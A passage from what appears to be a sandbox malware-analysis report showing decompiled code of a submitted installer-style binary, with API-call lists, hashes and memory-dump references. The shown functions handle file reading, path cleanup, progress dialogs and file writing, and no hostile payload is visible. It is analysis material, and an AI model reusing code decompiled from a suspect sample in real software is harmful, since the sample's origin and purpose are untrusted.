                      					}
                      					if( *__edi == __bx) {
                      						L34:
                      						__ecx =  *(__ebp - 0xc);
                      						__eax =  *(__ebp - 8);
                      						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                      						if(_t79 == 0) {
                      							 *(_t76 - 4) = 1;
                      						}
                      						goto L36;
                      					} else {
                      						 *(__ebp - 0x38) = __ebx;
                      						 *(__ebp - 0x18) = E004065C8(__ecx, __edi);
                      						if( *(__ebp - 0x44) > __ebx) {
                      							do {
                      								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                      									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00406239( *(__ebp - 0x18), __ebx) >= 0) {
                      										__eax = __ebp - 0x50;
                      										if(E004061DB( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                      											goto L34;
                      										} else {
                      											goto L21;
                      										}
                      									} else {
                      										goto L34;
                      									}
                      								} else {
                      									__eax = __ebp - 0x40;
                      									_push(__ebx);
                      									_push(__ebp - 0x40);
                      									__eax = 2;
                      									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                      									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                      									if(__eax == 0) {
                      										goto L34;
                      									} else {
                      										__ecx =  *(__ebp - 0x40);
                      										if(__ecx == __ebx) {
                      											goto L34;
                      										} else {
                      											__ax =  *(__ebp + 0xa) & 0x000000ff;
                      											 *(__ebp - 0x4c) = __ecx;
                      											 *(__ebp - 0x50) = __eax;
                      											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                      												L28:
                      												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
                      											} else {
                      												__ebp - 0x50 = __ebp + 0xa;
                      												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                      													L21:
                      													__eax =  *(__ebp - 0x50);
                      												} else {
                      													__edi =  *(__ebp - 0x4c);
                      													__edi =  ~( *(__ebp - 0x4c));
                      													while(1) {
                      														_t22 = __ebp - 0x40;
                      														 *_t22 =  *(__ebp - 0x40) - 1;
                      														__eax = 0xfffd;
                      														 *(__ebp - 0x50) = 0xfffd;
                      														if( *_t22 == 0) {
                      															goto L22;
                      														}
                      														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                      														__edi = __edi + 1;
                      														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                      														__eax = __ebp + 0xa;
                      														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                      															continue;
                      														} else {
                      															goto L21;
                      														}
                      														goto L22;
                      													}
                      												}
                      												L22:
                      												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                      													goto L28;
                      												} else {
                      													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                      														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                      															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                      															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                      														} else {
                      															__ecx =  *(__ebp - 0xc);
                      															__edx =  *(__ebp - 8);
                      															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                      															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                      														}
                      														goto L34;
                      													} else {
                      														__ecx =  *(__ebp - 0xc);
                      														__edx =  *(__ebp - 8);
                      														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                      														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                      														 *(__ebp - 0x38) = __eax;
                      														if(__ax == __bx) {
                      															goto L34;
                      														} else {
                      															goto L26;
                      														}
                      													}
                      												}
                      											}
                      										}
                      									}
                      								}
                      								goto L37;
                      								L26:
                      								__eax =  *(__ebp - 8);
                      							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                      						}
                      						goto L34;
                      					}
                      				}
                      				L37:
                      				return 0;
                      			}








                      0x004026ec
                      0x004026ee
                      0x004026f1
                      0x004026f3
                      0x004026f6
                      0x004026fb
                      0x004026ff
                      0x00402702
                      0x00402705
                      0x00402c2a
                      0x00402c2d
                      0x0040270b
                      0x0040270b
                      0x00402712
                      0x00402714
                      0x00402714
                      0x0040271a
                      0x0040287e
                      0x0040287e
                      0x00402881
                      0x00402886
                      0x004015b6
                      0x0040292e
                      0x0040292e
                      0x00000000
                      0x00402720
                      0x00402721
                      0x0040272c
                      0x0040272f
                      0x0040273b
                      0x0040273f
                      0x004027d7
                      0x004027ef
                      0x004027ff
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402745
                      0x00402745
                      0x00402748
                      0x00402749
                      0x0040274c
                      0x00402751
                      0x00402758
                      0x00402760
                      0x00000000
                      0x00402766
                      0x00402766
                      0x0040276b
                      0x00000000
                      0x00402771
                      0x00402771
                      0x00402779
                      0x0040277c
                      0x0040277f
                      0x0040283a
                      0x00402841
                      0x00402785
                      0x0040278b
                      0x00402797
                      0x00402801
                      0x00402801
                      0x00402799
                      0x00402799
                      0x0040279c
                      0x0040279e
                      0x0040279e
                      0x0040279e
                      0x004027a1
                      0x004027a6
                      0x004027a9
                      0x00000000
                      0x00000000
                      0x004027ab
                      0x004027ae
                      0x004027bc
                      0x004027c2
                      0x004027d0
                      0x00000000
                      0x004027d2
                      0x00000000
                      0x004027d2
                      0x00000000
                      0x004027d0
                      0x0040279e
                      0x00402804
                      0x00402807
                      0x00000000
                      0x00402809
                      0x0040280e
                      0x0040284f
                      0x00402871
                      0x00402878
                      0x0040285d
                      0x0040285d
                      0x00402860
                      0x00402863
                      0x00402866
                      0x00402866
                      0x00000000
                      0x00402817
                      0x00402817
                      0x0040281a
                      0x0040281d
                      0x00402823
                      0x00402827
                      0x0040282a
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040282a
                      0x0040280e
                      0x00402807
                      0x0040277f
                      0x0040276b
                      0x00402760
                      0x00000000
                      0x0040282c
                      0x0040282c
                      0x0040282f
                      0x00402838
                      0x00000000
                      0x0040272f
                      0x0040271a
                      0x00402c33
                      0x00402c39

                      APIs
                      • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                        • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: File$Pointer$ByteCharMultiWide$Read
                      • String ID: 9
                      • API String ID: 163830602-2366072709
                      • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                      • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                      • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                      • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E004068EF(WCHAR* _a4) {
                      				short _t5;
                      				short _t7;
                      				WCHAR* _t19;
                      				WCHAR* _t20;
                      				WCHAR* _t21;
                      
                      				_t20 = _a4;
                      				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                      					_t20 =  &(_t20[4]);
                      				}
                      				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
                      					_t20 =  &(_t20[2]);
                      				}
                      				_t5 =  *_t20;
                      				_t21 = _t20;
                      				_t19 = _t20;
                      				if(_t5 != 0) {
                      					do {
                      						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
                      							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                      							_t19 = CharNextW(_t19);
                      						}
                      						_t20 = CharNextW(_t20);
                      						_t5 =  *_t20;
                      					} while (_t5 != 0);
                      				}
                      				 *_t19 =  *_t19 & 0x00000000;
                      				while(1) {
                      					_push(_t19);
                      					_push(_t21);
                      					_t19 = CharPrevW();
                      					_t7 =  *_t19;
                      					if(_t7 != 0x20 && _t7 != 0x5c) {
                      						break;
                      					}
                      					 *_t19 =  *_t19 & 0x00000000;
                      					if(_t21 < _t19) {
                      						continue;
                      					}
                      					break;
                      				}
                      				return _t7;
                      			}








                      0x004068f1
                      0x004068fa
                      0x00406911
                      0x00406911
                      0x00406918
                      0x00406924
                      0x00406924
                      0x00406927
                      0x0040692a
                      0x0040692f
                      0x00406931
                      0x0040693a
                      0x0040693e
                      0x0040695b
                      0x00406963
                      0x00406963
                      0x00406968
                      0x0040696a
                      0x0040696d
                      0x00406972
                      0x00406973
                      0x00406977
                      0x00406977
                      0x00406978
                      0x0040697f
                      0x00406981
                      0x00406988
                      0x00000000
                      0x00000000
                      0x00406990
                      0x00406996
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406996
                      0x0040699b

                      APIs
                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406952
                      • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406961
                      • CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406966
                      • CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406979
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Char$Next$Prev
                      • String ID: *?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                      • API String ID: 589700163-1439852002
                      • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                      • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                      • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                      • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040302E(intOrPtr _a4) {
                      				short _v132;
                      				long _t6;
                      				struct HWND__* _t7;
                      				struct HWND__* _t15;
                      
                      				if(_a4 != 0) {
                      					_t15 =  *0x420efc;
                      					if(_t15 != 0) {
                      						_t15 = DestroyWindow(_t15);
                      					}
                      					 *0x420efc = 0;
                      					return _t15;
                      				}
                      				if( *0x420efc != 0) {
                      					return E00406A71(0);
                      				}
                      				_t6 = GetTickCount();
                      				if(_t6 >  *0x42a26c) {
                      					if( *0x42a268 == 0) {
                      						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
                      						 *0x420efc = _t7;
                      						return ShowWindow(_t7, 5);
                      					}
                      					if(( *0x42a314 & 0x00000001) != 0) {
                      						wsprintfW( &_v132, L"... %d%%", E00403012());
                      						return E004056CA(0,  &_v132);
                      					}
                      				}
                      				return _t6;
                      			}







                      0x0040303d
                      0x0040303f
                      0x00403046
                      0x00403049
                      0x00403049
                      0x0040304f
                      0x00000000
                      0x0040304f
                      0x0040305d
                      0x00000000
                      0x00403060
                      0x00403067
                      0x00403073
                      0x0040307b
                      0x004030b9
                      0x004030c2
                      0x00000000
                      0x004030c7
                      0x00403084
                      0x00403095
                      0x00000000
                      0x004030a3
                      0x00403084
                      0x004030cf

                      APIs
                      • DestroyWindow.USER32(?,00000000), ref: 00403049
                      • GetTickCount.KERNEL32 ref: 00403067
                      • wsprintfW.USER32 ref: 00403095
                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                      • CreateDialogParamW.USER32 ref: 004030B9
                      • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                        • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                      • String ID: ... %d%%
                      • API String ID: 722711167-2449383134
                      • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                      • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                      • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                      • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
                      				long _v8;
                      				signed char _v12;
                      				unsigned int _v16;
                      				void* _v20;
                      				intOrPtr _v24;
                      				long _v56;
                      				void* _v60;
                      				long _t15;
                      				unsigned int _t19;
                      				signed int _t25;
                      				struct HWND__* _t28;
                      
                      				_t28 = _a4;
                      				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                      				if(_a8 == 0) {
                      					L4:
                      					_v56 = _t15;
                      					_v60 = 4;
                      					SendMessageW(_t28, 0x113e, 0,  &_v60);
                      					return _v24;
                      				}
                      				_t19 = GetMessagePos();
                      				_v16 = _t19 >> 0x10;
                      				_v20 = _t19;
                      				ScreenToClient(_t28,  &_v20);
                      				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                      				if((_v12 & 0x00000066) != 0) {
                      					_t15 = _v8;
                      					goto L4;
                      				}
                      				return _t25 | 0xffffffff;
                      			}














                      0x00404f8d
                      0x00404f9a
                      0x00404fa0
                      0x00404fde
                      0x00404fde
                      0x00404fed
                      0x00404ff4
                      0x00000000
                      0x00404ff6
                      0x00404fa2
                      0x00404fb1
                      0x00404fb9
                      0x00404fbc
                      0x00404fce
                      0x00404fd4
                      0x00404fdb
                      0x00000000
                      0x00404fdb
                      0x00000000

                      APIs
                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                      • GetMessagePos.USER32 ref: 00404FA2
                      • ScreenToClient.USER32 ref: 00404FBC
                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Message$Send$ClientScreen
                      • String ID: f
                      • API String ID: 41195575-1993550816
                      • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                      • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                      • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                      • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
                      				short _v132;
                      				void* _t11;
                      				WCHAR* _t19;
                      
                      				if(_a8 == 0x110) {
                      					SetTimer(_a4, 1, 0xfa, 0);
                      					_a8 = 0x113;
                      				}
                      				if(_a8 == 0x113) {
                      					_t11 = E00403012();
                      					_t19 = L"unpacking data: %d%%";
                      					if( *0x42a270 == 0) {
                      						_t19 = L"verifying installer: %d%%";
                      					}
                      					wsprintfW( &_v132, _t19, _t11);
                      					SetWindowTextW(_a4,  &_v132);
                      					SetDlgItemTextW(_a4, 0x406,  &_v132);
                      				}
                      				return 0;
                      			}






                      0x00402fa3
                      0x00402fb1
                      0x00402fb7
                      0x00402fb7
                      0x00402fc5
                      0x00402fc7
                      0x00402fd3
                      0x00402fd8
                      0x00402fda
                      0x00402fda
                      0x00402fe5
                      0x00402ff5
                      0x00403007
                      0x00403007
                      0x0040300f

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Text$ItemTimerWindowwsprintf
                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                      • API String ID: 1451636040-1158693248
                      • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                      • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                      • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                      • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00402950(void* __ebx) {
                      				WCHAR* _t26;
                      				void* _t29;
                      				long _t37;
                      				void* _t49;
                      				void* _t52;
                      				void* _t54;
                      				void* _t56;
                      				void* _t59;
                      				void* _t60;
                      				void* _t61;
                      
                      				_t49 = __ebx;
                      				_t52 = 0xfffffd66;
                      				_t26 = E00402DA6(0xfffffff0);
                      				_t55 = _t26;
                      				 *(_t61 - 0x40) = _t26;
                      				if(E00405FAE(_t26) == 0) {
                      					E00402DA6(0xffffffed);
                      				}
                      				E00406133(_t55);
                      				_t29 = E00406158(_t55, 0x40000000, 2);
                      				 *(_t61 + 8) = _t29;
                      				if(_t29 != 0xffffffff) {
                      					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
                      					if( *(_t61 - 0x28) != _t49) {
                      						_t37 =  *0x42a274;
                      						 *(_t61 - 0x44) = _t37;
                      						_t54 = GlobalAlloc(0x40, _t37);
                      						if(_t54 != _t49) {
                      							E004035F8(_t49);
                      							E004035E2(_t54,  *(_t61 - 0x44));
                      							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
                      							 *(_t61 - 0x10) = _t59;
                      							if(_t59 != _t49) {
                      								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
                      								while( *_t59 != _t49) {
                      									_t51 =  *_t59;
                      									_t60 = _t59 + 8;
                      									 *(_t61 - 0x3c) =  *_t59;
                      									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
                      									_t59 = _t60 +  *(_t61 - 0x3c);
                      								}
                      								GlobalFree( *(_t61 - 0x10));
                      							}
                      							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
                      							GlobalFree(_t54);
                      							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
                      						}
                      					}
                      					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
                      					CloseHandle( *(_t61 + 8));
                      				}
                      				_t56 = 0xfffffff3;
                      				if(_t52 < _t49) {
                      					_t56 = 0xffffffef;
                      					DeleteFileW( *(_t61 - 0x40));
                      					 *((intOrPtr*)(_t61 - 4)) = 1;
                      				}
                      				_push(_t56);
                      				E00401423();
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
                      				return 0;
                      			}













                      0x00402950
                      0x00402952
                      0x00402957
                      0x0040295c
                      0x0040295f
                      0x00402969
                      0x0040296d
                      0x0040296d
                      0x00402973
                      0x00402980
                      0x00402988
                      0x0040298b
                      0x00402997
                      0x0040299a
                      0x004029a0
                      0x004029ae
                      0x004029b3
                      0x004029b7
                      0x004029ba
                      0x004029c3
                      0x004029cf
                      0x004029d3
                      0x004029d6
                      0x004029e0
                      0x004029ff
                      0x004029e7
                      0x004029ec
                      0x004029f4
                      0x004029f7
                      0x004029fc
                      0x004029fc
                      0x00402a06
                      0x00402a06
                      0x00402a13
                      0x00402a19
                      0x00402a1f
                      0x00402a1f
                      0x004029b7
                      0x00402a33
                      0x00402a35
                      0x00402a35
                      0x00402a3f
                      0x00402a40
                      0x00402a44
                      0x00402a48
                      0x00402a4e
                      0x00402a4e
                      0x00402a55
                      0x004022f1
                      0x00402c2d
                      0x00402c39

                      APIs
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                      • GlobalFree.KERNEL32 ref: 00402A06
                      • GlobalFree.KERNEL32 ref: 00402A19
                      • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                      • String ID:
                      • API String ID: 2667972263-0
                      • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                      • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                      • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                      • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 77%
                      			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                      				char _v68;
                      				char _v132;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t23;
                      				signed int _t24;
                      				void* _t31;
                      				void* _t33;
                      				void* _t34;
                      				void* _t44;
                      				signed int _t46;
                      				signed int _t50;
                      				signed int _t52;
                      				signed int _t53;
                      				signed int _t55;
                      
